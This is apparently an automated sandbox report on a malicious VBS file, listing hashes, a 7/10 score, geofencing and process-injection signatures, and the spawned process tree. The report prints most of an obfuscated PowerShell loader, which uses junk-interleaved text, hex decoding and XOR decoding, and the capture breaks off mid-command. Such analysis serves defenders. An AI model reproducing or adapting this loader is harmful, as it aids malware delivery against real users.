03478e943747cf8baec9db5d77c280077e2250693a72fbae9d14e10ddd459947

Analysis

max time kernel
134s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
23-11-2022 10:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

28288277-MSC038837.vbs
Size

399KB
MD5

4c2813e6b5b012c84caea68e91051115
SHA1

56e77ee23bd42f375b7558774b055173c5b78da2
SHA256

03478e943747cf8baec9db5d77c280077e2250693a72fbae9d14e10ddd459947
SHA512

22c0b09207cb6d0f93765ca63fbf238d8d924b01ea5be45322e12b6beddf7672d110abdb4b2cd26192b1b4b7df4dce5557b679a8a711802aa2e01e97f9bb0061
SSDEEP

6144:z698S8/DcGaT3qRXbdjohlI/ss5vzBbEpXUrnY3FXPfkhSkoOACCXL:z6CS8/1aT6hdUhlcVBbEpXUryJPfkUrX

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1568 powershell.exe
1568 powershell.exe
4864 powershell.exe
4864 powershell.exe
5076 powershell.exe
5076 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1568 powershell.exe
Token: SeDebugPrivilege 4864 powershell.exe
Token: SeDebugPrivilege 5076 powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe

pid	process
1568	powershell.exe
1568	powershell.exe
4864	powershell.exe
4864	powershell.exe
5076	powershell.exe
5076	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4216 wrote to memory of 1568	4216	WScript.exe	powershell.exe
PID 4216 wrote to memory of 1568	4216	WScript.exe	powershell.exe
PID 1568 wrote to memory of 4864	1568	powershell.exe	powershell.exe
PID 1568 wrote to memory of 4864	1568	powershell.exe	powershell.exe
PID 1568 wrote to memory of 4864	1568	powershell.exe	powershell.exe
PID 4864 wrote to memory of 5076	4864	powershell.exe	powershell.exe
PID 4864 wrote to memory of 5076	4864	powershell.exe	powershell.exe
PID 4864 wrote to memory of 5076	4864	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28288277-MSC038837.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Katakombens = """ElFReuBrnSlcbatCriUnoSunMi BeHPhTLuBSu Ek{Di Gh Mo Co RopOnaSarSiaPomAb(Hd[ZiSadtJurBaiDonMigIn]Vi`$DrHMaSSk)Po;Ta Ef ar Ch Pe`$StBPeyretBoeWhsBi Ge=Er SaNreeAcwSk-MaOPrbTrjReeincSptFe TabBrySatVaeFl[Co]Me Be(Li`$OkHLoSAv.CaLMieTinMogSotUfhHa De/Mo no2No)Sp;ak Hi No al BrFOvoStrOp(Go`$RiiTv=Ca0Ko;Tr he`$Seipe Gr-anlAmtRa Ta`$LuHHoSTe.UdLeseNanStgBatSuhun;Ef Co`$AciKo+re=Ve2Va)un{ek Om Bi Es Be Ka Ex Vg Bl`$TuBSiyRytheeDrsVi[Fo`$PaiRe/Se2Mi]Am Tr=Uf Sc[MicProNsnalvudeBarTetPu]Tr:Sn:ShTApoArBreyKatDieKn(Ad`$NoHReSUn.EkSLeuOvbAksTetkorMoiNinAdgTy(Ko`$ReiCo,Oa Co2St)Be,St Pl1Fj6Re)Fo;Tu Bi Ap`$FoBReyJotHoeStsRh[St`$tviEv/Af2ti]Be Su=Ha Gd(Le`$CaBNeyGatGeeEnsNe[Fl`$spiCl/Un2St]Ba Ha-HabSixSkoFarCa Sk1El2Tr3Ch)Ba;Wr Fo Di Ov Ma}Gy St[soSTutCirRoiTinTigOr]St[FoSFryrhsIgtSaeUdmDi.BmTLaeAuxDetKa.AkETrnFrcUnoCadiniDonPlgAd]Ac:Ve:tyASuSSoCStIIdISt.ChGRieSutUlSSetDurPoiBjnGugFo(Pl`$UnbCayAutVieAlsTr)En;Sk}Ld`$SvCVizUniBogseaDonEiyAa0La=osHSpTCeBBo Ve'Fo2Un8No0So2Bl0Os8Ro0DaFAn1DyEsu1fo6Op5Un5Bl1HyFRa1Um7St1se7Pe'Et;Ac`$StCSpzPiiKugSoaPinOpyTa1Op=PaHDiTJoBTa At'Va3Pe6Sc1fr2al1Fo8Ac0Ge9Bu1Io4Un0Ch8Sl1Tr4Gr1AdDTr0SkFGl5Fn5be2GeCpr1Fi2Sa1ob5Fd4Ok8Na4Ha9Si5Sl5Af2SeEHy1Sp5Se0Ec8Si1ApAUn1paDRe1KiESo3Ga5as1PrAPo0UnFHj1Ot2Fl0KaDPl1FaEFl3St6Is1DeEOp0AlFBa1to3Sl1Fj4Mo1SjFUn0Sa8Fd'mv;ma`$SoCBozFoiWagInaWhnSpySt2In=PaHCaTZoBMa In'Ac3BeCxa1LaEFl0RaFCe2ReBHo0Ri9En1Ma4Ga1Da8Em3FiAUn1SkFGa1suFRo0De9Gn1AfEUn0Fl8Li0Al8ns'An;Po`$TiCDezSliAdgToaOvnKlySi3dr=DrHVoTStBMa Ab'Ro2Ek8Re0Sv2As0Re8Nu0srFFa1MeEEu1De6Fe5ch5Bu2Bl9Sp0SaEUn1da5Fs0ReFAd1Tr2Un1Fo6Co1OfEPi5kl5Dr3No2Ma1Ko5Kr0CoFov1OpEFu0Sp9ki1Gu4pa0InBTo2Lo8Ta1KrESe0Fr9Ph0prDDu1No2Sv1Zo8Kl1CyEVa0Bl8fo5Un5Ef3al3Gr1brASt1Eu5Af1ImFNe1Di7st1luESm2ta9Sr1PrEpr1LgDDa'Ly;lo`$JuCSuzAdiTugViaBenPiyPr4Ov=RiHBlTFeBUn Te'An0Hy8Cu0SpFMe0La9De1Eu2Br1In5He1DrCBu'Ou;Cl`$LoCCozEmiCagBeaRenKyyVa5Hy=ViHVeTklBPh el'Ud3TuCOm1AfELa0meFUd3Fe6Ke1My4Ka1StFSi0unEFe1Pj7St1BlEKo3Im3Ba1CoADu1Po5Sy1ShFFa1Am7fo1InEAn'Fl;Fr`$OvCHizDmiSlgAnaAdnSuySk6Ha=RaHGrTVkBfr Bi'Ta2Ou9Ba2FiFma2Kr8Pa0GaBAf1FlEIc1Pi8Fi1Bi2sv1MeAIn1Pa7Vi3tj5So1SeATu1Po6Tb1DaEIt5Ca7Ba5SkBsc3Se3mo1Se2Ma1reFSk1JaEDo3Pr9ha0Rh2Ve2Fl8Ci1an2ba1FaCMy5La7Do5UnBFr2FaBTr0DeESo1In9Sy1Cl7In1Sk2By1Di8Fo'de;Ca`$EfCImzDoiUngspaBanReyCa7Ca=DiHKuTEnBca Ka'Br2Tr9Dr0MaESy1Ho5Dr0MeFFo1Ba2Sa1De6xa1LiEPa5Fl7Se5PrBLi3Sv6fo1PrATe1Co5Ru1FaADr1EfCIn1BeESp1BiFHe'Mo;In`$AlCWizKhiLegUdaSknMayAn8be=TrHInTchBLn Sy'co2No9Hu1FoEsc1KaDSp1Pa7Ar1MeESk1en8Ad0CoFDe1PeESb1InFTe3TuFSu1PaECh1In7Te1EpEfo1TwCVi1TiAPl0RiFNo1fiEAf'Sk;Am`$noCArzDoiSegTraInnSayNa9Ir=HiHRhTAuBCr Se'Ou3Be2Ov1No5Ef3Su6Un1TjEAn1Fr6To1Mu4Pe0As9Do0Mi2Fr3Sh6Lr1Sh4Si1ExFFr0TeEDe1Tr7Ge1FoENy'Se;fa`$AnUWorSaaHonSviarfVieUnrGeoSeuTrsTi0Ti=ChHSuTPoBFj Ra'Br3En6Ar0Vi2sy3GrFNe1DeEGl1Ha7Me1TrEAu1baCSu1MaAPe0NeFUo1SkEHo2MoFCo0Sp2Pr0BeBAq1CoEVa'Ve;Re`$ScUGrrYoaInnpliArfUneIsrLeoUnuStsHy1In=ReHAnTViBrh Bu'ga3tr8Ta1Se7St1ThADe0Ge8Ou0Ra8Aa5Re7Mr5OrBLi2vaBJo0GeEMa1Be9Re1En7Ed1Ba2mo1Op8ba5St7Sc5CrBEx2Co8pr1CiEUp1DeAVi1sa7Bu1skESi1NuFSu5Fl7Ha5DrBTa3taAAn1Ci5Ra0Au8st1Ro2Tr3Ha8Om1Ma7Ti1SuASt0Ud8Jo0So8Ub5In7Sc5PuBOb3moADe0YaEHo0CaFOv1In4Fa3Bo8Bl1la7Be1HeAKo0Is8Sk0Be8Ri'Fe;Hr`$BeUParBraVanneiSlfCaeSurSpoUnuFlsIn2Fo=GaHOzTNoBAu Fo'Dr3Af2Tr1Sd5Ha0SkDFi1Fl4an1Ou0Co1FrEbe'An;Bl`$PaUirrInaSlnVaiDifspeNarJdoQuuCusSo3Sp=OmHAxTSaBWa St'Ca2buBFo0TuEPe1Re9Ha1St7Pr1Vl2Jo1Su8Cr5un7Pi5PeBBe3Te3Sa1As2Po1SbFIn1GeEBr3Mi9Re0Tr2Bu2Gl8Re1Pe2Sm1PhCSh5Ph7Ma5DeBDr3fe5Ka1CuEGa0KvCEr2Pl8Un1Re7Ly1Al4Ja0SlFCu5Tr7Io5SeBAl2NaDBe1Si2Ga0Un9Ek0PuFRu0KoEud1doAIn1St7No'Hr;Em`$fiUOvrCoaEnnSviSafFaeSurAkoSauSosFr4Po=FlHJeTToBCa La'Ni2SuDPr1Fy2St0Mi9Ba0NoFDe0DaEcr1gaAIs1An7St3PaAUn1Fo7Ta1De7Ke1As4Tr1Re8Dr'El;Su`$InUFrrTeaprnPoiFofPueAdrBioMiufasSo5Pu=NaHCeTOuBGl Ui'de1Om5Pr0foFAf1orFNy1Mo7Co1So7Fl'Be;ud`$OpUSarouaConAciPafEmeSvrUnoCouGlsAf6An=PaHTrTDoBFu Ug'Ka3Po5Se0LrFed2ReBSr0Ov9Ge1Fa4Tr0FuFVa1FoELi1Co8Sh0VeFRd2AmDQu1Yd2Fo0Fu9Sv0ScFLe0koEte1CaAVo1Li7Sg3or6Ec1PrEFo1Wh6To1Ki4Ro0Un9Sl0to2Bo'Lo;Un`$SpUSorBraEknsciDafIneParUdoAtuCosTy7Ko=moHCoTMiBUn Af'De3fo2In3QuEst2Ud3Lo'De;ch`$SaUAmrOpaSanSpiUnfLieGerIroReuResIm8Ma=SeHFjTBaBLo Ji'Co2se7Re'Ko;KuSFreMitPl-KoAnolBliOnaNosTy He-FrnUnaAnmAgeLu NaUFirFiaTinSkiTafNeemerInoPruStsGe9Fo Ud-GrvfoamolSeuOpeBa Ta`$UlUStrSeaPrnGliOmfsyeParEmoDuuUdsGr7To;SofTrumenGrcsptFliDuoTanCa SkfAbkMopPa Di{BhPAsaCorSoaTtmAs na(Go`$LavNe_AdmVa,Rv Su`$vevNo_UnpFi)Au Pi Ok Un Fa Hj;Ga`$SedFarCysFraValgugMa0Hu En=GuHInTUnBOb La'Av5LaFSt0LuDPs0StEEk1Gn5In1Kl6St5wiBPo4id6ra5BiBNo5Tr3Ps2Tr0No3BiACh0AmBSp0PrBdi3FoFFa1Ti4Th1Me6Tr1suASh1He2De1br5Sp2Id6Ag4Ni1Fe4Cr1Pl3Pa8Di0SbEBa0Ps9Na0Me9Co1waETr1Ae5Pr0BlFKo3PoFKy1un4Pa1Sk6Un1arAAt1Ho2sy1Sa5St5He5Pu3DiCNo1GrEBo0MoFSo3MaAGr0Di8Ov0Su8To1FoETr1Pi6Ki1Re9En1Hi7Ro1Dv2Ti1KoETy0Ud8Id5Im3Wa5Ca2Au5NgBSt0Ad7Re5RuBEx2SkCMe1Pr3Co1SeEKl0Sn9Fe1FyEIn5Ha6Gl3Sk4De1Jo9Ud1Bo1In1BuEIm1Fr8Ko0LaFBa5PiBAc0Hi0Er5RuBSa5waFCo2Fl4Ec5Fl5Fi3baCTr1da7Sv1Za4Ci1sa9Fr1OvASi1Ca7Pl3PhARe0Td8Te0He8El1ReEWo1Il6Ta1De9Fa1Si7af0Cr2af3Ry8Es1LiAKe1Ha8Ps1Ir3Fl1StEAl5soBBa5Ta6Eu3MiAFl1Pa5Re1ImFOv5GrBSi5SpFKu2Te4Fr5Ra5Bi3Af7Un1Bo4No1No8Hj1MoAVe0suFBy1ta2Co1To4Ch1es5te5Sc5sk2Ra8Fl0DeBFa1Ta7St1De2En0FoFFo5rh3Ea5UmFCo2KyEKa0Pr9Ko1SaABe1Tr5Re1So2Sp1DuDLn1PeENo0Ma9Ba1Ex4Il0JuEEf0Af8Kv4Wa3Ku5by2Im2Le0ud5Im6ma4UlATi2Fr6Ka5Va5Af3StEDu0CaAFi0SkEOb1saAMu1Li7Di0Al8Pa5Co3Bi5BoFBa3Pr8Am0Sn1Op1An2Se1MaCaf1SlAVa1Lm5Vo0Ho2In4BaBMe5Ty2Af5PaBAk0pe6Sa5No2Ne5Fa5An3FoCha1ReEFu0AsFHm2RoFGr0Pa2Me0SnBFr1MiEne5Sm3Sv5NoFfe3Le8Sl0Uf1An1In2Pl1SeCGa1TrAFr1Aa5Be0Be2In4InAjo5ch2Ca'Ab;ViUFerFlaRenFeiBefvieUnrSkoPouMosBl9An Sk`$ImdNarSlsPlaFrlAngVe0Hi;wi`$LodVarTrsTraColsmgTr5Sp Ed=Te UnHDiTslBCl Mo'Tr5FeFpo0KnDFl1VaAHo0An9Ur2Tr4Sp1ReCIl0FlBMa1IlASt5SuBPy4No6Lo5TiBEd5DiFNo0XeDFo0stEBi1gr5La1Pr6Ce5Ko5ak3MeCRe1DiERa0TiFRa3An6Sa1PrEMo0VeFMe1Os3St1Go4St1ViFKo5Cu3Ac5PiFDo3Uf8Un0Ma1Vi1Pr2Ey1BlCDi1SkAUd1Ka5Ke0Si2pr4Ve9lo5Co7pa5WoBGu2Hj0Ny2CoFHu0Ap2Es0TaBGa1CuEUt2Pl0Wr2Gi6Ba2Re6fo5VaBGe3BeBTr5Ek3Cl5PrFPr3ja8Is0Tr1Co1He2To1PhCKo1KuASe1Ud5Sy0Li2Ps4Di8Re5Tu7Fe5PoBOr5OmFSp3No8Re0Tr1Mu1No2Qu1AaCSt1LyAUd1dg5Le0Ri2Or4NoFSp5No2Tr5Re2Ko'Pa;udUBrrUnaJnnPeiUnfUneWorEvoTeuPesIn9Ek Fe`$WidJorAusPoaMilbrgFo5Tr;la`$BedPirSksMaaNulSpgUn1Pr Ma=He TyHStTDeBCu Sy'In0ba9Ex1SyECy0PlFdi0PiETa0Ri9Be1Ad5ho5SlBPl5LaFTr0ReDCa1KnANe0Or9Da2ch4Mu1GrCFo0BjBUd1CoAak5No5Ix3Co2Sa1Ve5Po0HoDSl1Ar4Ma1Se0In1MaEIn5He3Ap5LuFSh1Ma5Me0VaERa1la7Be1Ju7Ac5Sl7Fo5OvBce3StBDe5Ov3Le2Sd0Cu2Hu8Ve0La2sy0St8Va0OpFLo1PrETr1Re6Br5Sk5Pl2El9Ud0TrEPa1Di5Ho0IsFAr1Gu2re1Bu6Vo1suECa5Lu5Eg3Gl2Fo1Vi5Mu0LiFPi1RaEFe0Hi9St1Ba4Ky0DiBMe2Kr8Bi1AlEDe0Et9an0EfDGo1Ma2Fi1Eu8Su1DeEbe0Ov8Mo5Ty5Sw3Cu3Fo1DaAMi1Pr5Ko1FoFOp1su7ho1ToEKa2Un9In1AdEBr1auDPo2Da6Lt5pa3tv3No5Tr1UnEre0CiCAl5Ar6Fo3Ex4me1Ec9sy1Pa1Pr1LaESl1Ov8St0ChFEx5SuBPa2Ku8Pl0St2Di0In8St0MoFSq1ArESp1Dj6Al5Ve5Om2Pu9Tr0PeEIn1in5tr0BaFmi1Sc2La1Ch6so1ReECo5Mo5Ne3St2Ca1Bi5Ga0WaFDa1ZiECh0Wi9Da1Un4Et0StBTs2Pu8St1SaECo0Se9En0KrDMa1Lo2Th1Di8No1arEDi0Af8Cy5Ri5Ba3Mo3Ka1chADe1Af5St1ClFfe1Fl7om1SaEPo2Sv9Am1AfEOs1MaDSt5Ke3La5Sp3Mi3Ta5Ex1skEVe0gaCFa5kd6Ga3bl4Dr1St9Mi1Ca1Me1StEGe1Ca8so0SnFgl5BrBSw3Ha2Go1In5To0KaFKo2PaBRe0GrFJu0Ka9Ov5Ba2Sk5Em7Lr5MiBDe5De3Ca5miFSa0KeDKa0FeESl1Ti5La1Li6Ar5Sa5Va3LiCEj1RiEru0FrFIn3Wa6Ce1TiEMa0GeFSu1Ce3Sl1Gr4un1SyFMi5Ov3Sc5SiFFo3af8Vi0Di1To1gu2Al1RiCSo1HjARr1Ra5Fn0In2tr4ThEVe5de2Sp5Su2Su5Br5Hy3Ol2Af1Un5In0frDGe1Po4Ca1Fe0Su1KoESk5Dy3Ov5WiFSo1Dd5Ph0BoEFr1Re7An1Ov7Se5Ha7An5auBLf3VrBSi5Ko3Tu5heFWe0MeDLr2Ma4Ko1pr6he5Wi2du5To2In5Pa2Ep5Do2Pr5Pa7In5SeBRe5EmFGe0UmDPa2Su4Ca0EkBvi5Pl2vi5St2od'Af;PlUInrudaUfnFoiTrfLoeclrBeoMauHasAq9Du Un`$QudberBrsTraInlFrgCe1Li;Ne}PhfJuuFdnPrcWotEsiRaoDindr TeGSuDBeTSn Ot{SpPSyaFarChaBomCa Kr(Ru[LsPDaaElrShaEkmKleLitpueNorSt(HnPChoKusariFotshiSkoOunIn Hv=Du Gr0Sc,fr BeMLaaTenTudReacitSooBerukyGa Ri=Op Ve`$ReTNorPruImePa)Sk]Be Un[AnTEnyAfpAreAe[Mo]un]La Ko`$PavViaPtrSk_DepFeaUnrKoaBomspeHatUkeurrSusHy,An[MePMiaOnrBaaFlmMeeMotKoeAsrTo(OvPAvoorsSpiqutitiPdoKvnDe Ma=St Un1Un)Ud]Se Sk[MaTFayBepSkeDi]ax Ed`$NovSerJetOv Do=De At[PrVReoIniTodDa]Sk)Re;Va`$irdForBysSpaLolStgFu2Av Ca=Ge FiHVrTSoBRe Ud'sk5KiFAl2FrDHn2SpFPh3Ge9Th5JoBDr4Be6Un5msBpr2Am0De3CaAar0asBFu0ReBGi3SpFIn1No4Be1Tr6La1AdABe1Sk2Fi1Fr5Gu2Ca6Un4Al1En4Tu1Fo3Lo8Pr0afEKa0De9Co0dy9Su1RaEBl1Fi5Di0DaFSo3AuFko1Di4bl1Cl6Lb1LiADi1bj2Ov1Tr5Re5sy5Ax3KuFDy1SpEDe1UnDAn1Da2St1Af5Ge1TiEEp3MiFPs0so2Po1Im5Pa1GrAGa1Em6re1Po2Ty1Pa8Je3ReAPo0Te8St0Pr8ca1SpEUd1Ex6Br1De9No1De7Qu0Re2Ov5Na3Ty5Ny3Fa3Ri5Je1shEFl0AmCGa5Gy6Hs3Ga4Co1ba9Sp1Ne1Cr1LoEAg1Te8An0ReFKo5LaBVe2Mu8Sa0Pr2Cy0He8St0ToFKl1FaEFe1Vi6Be5St5Cu2rn9Op1BoEBl1SkDco1Ro7Uv1KeEDe1Fy8Un0DiFDe1Tr2su1be4Li1Bl5Fo5Re5Ek3GaAKe0ph8La0Ca8Fr1MiEIs1Ne6Le1Ne9Sm1Re7Le0Ba2Tr3Pa5Ad1PsARo1Cu6St1SkEDi5Mn3Sk5SvFTr3Pl8Ga0Fo1Ka1Si2Ge1LaCDe1PlAAv1Re5Pr0Es2Af4Co3Pa5Pl2ha5So2Ke5Li7Ll5EkBSl2Re0Ta2Be8Hi0in2Hu0Oi8Lu0PlFSe1VsERi1Je6Be5Un5re2ak9Ko1LiECh1KlDEx1de7Rv1CrEVe1Ci8Si0FiFsu1Fa2Rh1Be4Ti1Ov5Ou5Sn5Sa3coEKu1Fe6gy1Tw2Pr0PrFFa5In5Al3DeAGr0Re8Ko0Mo8Re1haESa1Sa6As1Mi9Ch1Sn7Op0No2pt3Uk9Me0CuEPl1Co2Un1Ac7Un1SlFKr1AnEWh0Pu9In3SiAFl1La8Dr1Ti8Tr1UnEFl0Do8Sp0Fr8St2Pl6Kn4Kr1On4Ex1Ps2Ha9Dr0SeEFo1Ki5Re5Fa2an5No5Ko3BiFSa1PaEPe1LeDMo1Sw2Br1Ho5Re1MiEPr3MoFBo0Si2Fo1Au5Sp1FrAGa1Vi6Pa1An2An1Vi8Gi3Sk6Ba1Tr4st1PlFAd0BeEVa1Ra7Am1AfELs5Tr3Ba5UnFPh3Gr8Hj0Ne1Ce1El2Un1KiCSp1GrANo1pi5Pi0Ke2Be4Vi2Vi5Su7Gl5ToBDo5GaFpr1kaDIl1SmAan1Br7Ko0Ek8Sa1luEKi5Ve2Re5Di5Ci3ApFin1OpEAn1IdDKl1Be2Ka1So5Op1EnEBr2HoFAf0Ba2Mi0KvBPr1FrESt5Gr3Pr5UnFUd2paEUn0sk9Ov1iaAev1pa5Bo1Gh2Di1ChDBy1HyENo0Ba9Re1Pr4La0ChETi0Fi8Au4SlBTr5St7Ba5DaBEp5EkFun2ReEOr0Ya9Di1GuASa1Sm5Mu1Ex2Ud1AcDHa1TaEAs0Ka9Ka1Le4Gu0UdEPl0Di8Br4DeADr5ta7fa5SnBOp2At0Fo2Tj8Fo0Di2Mo0Tr8Tr0UnFBa1AeEam1Va6Af5Ov5Sy3At6In0raEMa1ov7Ha0HaFSk1Ne2Sp1tr8Re1AdAAr0Or8Ta0PrFwi3BrFEs1TrEYa1Co7Fr1SqEDr1SiCFa1OaAAf0SlFKn1beEFa2Tb6Ti5Kr2Fu'He;UdUForGlaTenBliScfSpeBurBloHauansGi9Ou Pr`$SkdDmrIdsSpaShlDugAb2En;Fs`$StdHarNasGlaKelTagMi3Fo sp=Dg ReHOpTDoBUl Af'Ne5ImFTe2UnDun2ChFFi3Wr9Ti5Ko5Fy3SuFDy1LeEHa1koDDi1Fa2Pr1Ak5ho1SaETu3Kn8Te1Bl4Ti1In5Fl0Si8Ja0NaFAs0Ch9Ab0KuEFl1Ud8Pr0UnFRe1Ta4Et0Op9Ko5Gu3Ro5PeFMo3Ud8ob0Py1Ve1si2Ka1EfCFa1NoAma1Ga5Dr0Pr2Ek4SpDVe5Pr7Da5LiBFe2Da0Ac2De8Mi0Un2So0Sk8Br0RaFSa1ReETe1Op6Si5Si5Sa2Di9En1MeETj1NoDBe1Ka7Pa1CaERa1Qu8Lu0FiFRa1Si2Bi1By4ma1Fo5Gh5Pa5Um3Ad8Br1CuAPa1Ma7Un1Le7gu1Re2Un1Ce5Ke1RoCBa3Se8Fr1Py4Sn1Co5Po0ArDUd1VrEHa1Sk5St0InFPa1An2St1In4Pa1Eq5Sn0Su8no2kr6al4Po1St4An1So2Ca8pe0RoFRo1ReAko1El5Ud1reFOs1EmAUn0gu9Sp1UfFFa5Fr7Re5leBMe5VaFGo0TrDSc1OpAUn0Su9Br2Ko4Sp0TeBfu1ArABl0Di9Fl1AnAAu1Se6La1InEMo0unFMe1krEEp0ud9Gl0Un8Ba5De2Fl5Mi5Ju2Sc8Ps1SaETr0DiFIv3Vi2Le1ag6mu0LyBAd1Su7Ti1SuECa1Ko6As1JoEKa1Wh5Re0SiFme1ChABa0CoFTe1St2He1Be4Am1No5Se3InDBi1Ph7Pr1ByAGr1ReCmi0Tr8Pu5Ch3Sk5BoFMa3Pe8Fo0St1Me1Di2En1tuCto1MaACi1So5Te0ud2Pr4LaCHo5Ek2La'Pe;UnUMirSiaBinStiakfRueCorNioPhuDasTr9Bo Di`$FodForbasAbaJulSagSa3Di;Sp`$ledSirCosQuaPalHjgDe4Si Do=Lo DyHskTElBGe Sm'Op5MoFTh2KnDAd2AsFKe3Lu9Cu5Ka5Me3OvFMa1VeEGl1CoDea1Ra2fe1Ba5af1AcEHa3Xi6Mi1FrEud0SkFre1so3pl1Ma4Sn1vaFOp5An3Re5DiFRa2GeESt0Ep9Sn1MoAUn1Vo5ef1Ov2Un1inDBi1TrETe0Aq9Bu1De4ho0BaEKa0Pl8Be4Fo9Mi5Ma7Un5CoBDa5NoFVe2HeEPy0lo9Sa1SaAHe1Mu5Pl1Af2yo1PaDMi1CoEDe0Ar9Ko1Be4in0ReEIn0be8Sm4Ma8pr5An7Sa5OpBSi5SjFMi0FaDPe0Am9Hu0NoFOu5To7Co5StBLi5BrFAf0BrDSa1SaASt0Ca9Up2Ch4Ud0KiBDe1MaALi0Fj9Fr1VaAPi1Tr6Kr1CeESl0ArFMi1puEMe0Co9Id0De8Sh5Sk2Di5Ap5Mi2Fu8Or1CaECo0AnFCa3Af2Pu1Co6Co0KeBKo1Di7Pe1GeEHo1Fo6Lu1SlEBe1Ek5Ha0MaFUn1StASk0FiFTr1Ov2Re1Da4Re1Ju5My3ScDNa1Vi7Si1SyABi1StCLi0ho8al5st3St5StFBe3Ti8Li0Do1Da1St2Ir1SvCKe1TvASt1Sw5Ba0Fo2Py4UnCOp5Du2Su'Ya;fuUVirDsaStnSmiThfmoeforTaoBiuSesSh9Fo Ri`$GrdSurvesSaaPalofgIn4Sh;Su`$RedBurBrsAraRelTegBo5Ge So=Se JaHCoTNoBKu Ma'Fr0Ga9No1InEDl0NiFti0SuEMo0Go9Af1Re5Un5UnBSl5EmFHa2StDSv2DoFSm3Sc9no5St5Ek3Fi8To0Ga9Fa1ClEDi1OpAPo0StFDe1InEOb2SeFEn0Fa2wh0YeBre1PiESl5Pr3Ma5Hy2Ba'Gr;LeUPorNoaGanSkiDifRoesarKooRduEtsFa9Re Fo`$AmdMirMesspaAtlVagSu5Sp ko Sa Fl;Pr}Co`$AmkInkSl Th=An InHKiTChBli Bu'Di1Dr0Br1AnEBe0Ep9Na1ka5Fo1EnERe1Re7Bl4do8Fr4La9Ar'bu;By`$RedLirInsTiaEnlBogSa6La Pl=vi NoHDiTPnBBy Vo'As5HaFRa0GaDCo1SpAFo0il9St2Br4Un0maDSt1EnAPa5StBIn4po6Ad5FuBCa2Bi0Fo2Sp8Fr0Re2Me0Fe8Sa0TuFDi1VaEsk1Ak6Re5Un5Im2Ra9Sk0GiEDe1Ro5Gr0HeFIn1Ha2Ce1Im6Fl1ydESt5Ha5Fr3Re2Qu1Sp5Un0MaFPl1BrEVe0Vg9De1Pu4Co0GeBBa2Fa8To1EkEbu0Sk9Mi0PsDSk1in2bj1Hd8fo1BaERe0Be8ni5Sc5Im3St6Kv1PaAMi0ps9Ue0Sv8Ra1Ka3Bl1MeAef1Su7Id2no6Zo4Cl1Co4Co1No3AnCPt1RaEAf0GiFCu3reFHe1PrERa1Af7Pr1DeEKa1LeCKo1SkAKi0heFKu1DoELi3KoDKl1ne4Du0Or9Fo3StDDi0ScEBi1At5Ha1Pe8Pi0GiFUn1Li2No1Ma4Ov1Fi5Me2KnBab1En4Ba1Un2Le1He5sp0DeFHa1VaEPl0Rd9Ca5Co3Bi5Re3Sy1CoDNo1Kv0Te0HeBHa5MaBEu5BaFLo1Ou0St1Fa0Sa5kaBFi5boFPi2GrEFo0Un9De1DiACh1Sy5In1Wh2ve1GeDPi1enEDi0Ga9Tr1Co4La0BiECu0Ph8Bl4ReFOp5An2Ub5Mu7Sa5siBPs5Sk3Ma3EdCTh3UiFRe2UdFmi5LoBSo3VaBMa5In3Sp2Co0Sn3Sv2jn1Pr5De0SlFSh2LiBKa0DeFPa0Na9Ba2Kr6Pr5Me7Im5FoBBu2At0Pe2FoEou3In2ho1By5Pe0SlFFa4Sk8or4Ha9Tr2sa6Pr5Vi7Ar5AmBUp2At0Ha2DeEGa3Fi2Hu1Va5Ud0KaFwi4Ho8Tj4Fo9Pe2Te6Ge5Ce7Fl5phBSs2Fr0Cr2FiEup3Su2Al1Fr5Tr0OvFSv4so8Ej4Fr9Un2Fr6Ba5Ba2In5SoBMo5Ns3De2Af0Ma3Sl2St1Ku5Al0CoFGa2OvBUk0InFBo0Pr9Ra2Ni6Mi5Ed2Bu5Gi2Pe5En2Bo'Es;NoUEarDeaUnnDeiPrfCoeInrUnoKnuLesLg9Su Pe`$sadInrPisraaMilsigDi6Te;in`$OcvAraSursu_HenBrtUt Di=Ka NafFoktjpPr Sk`$OmUAvrBaaKanPoiBlfFdeSprCooMiuEnsru5Ks Be`$ApUWorFuaCanMeibafSaeElrPuoPyuHosNo6Pr;Mo`$FodstrSpsScaPalRogOp7Op ki=St SeHSmTTiBUn 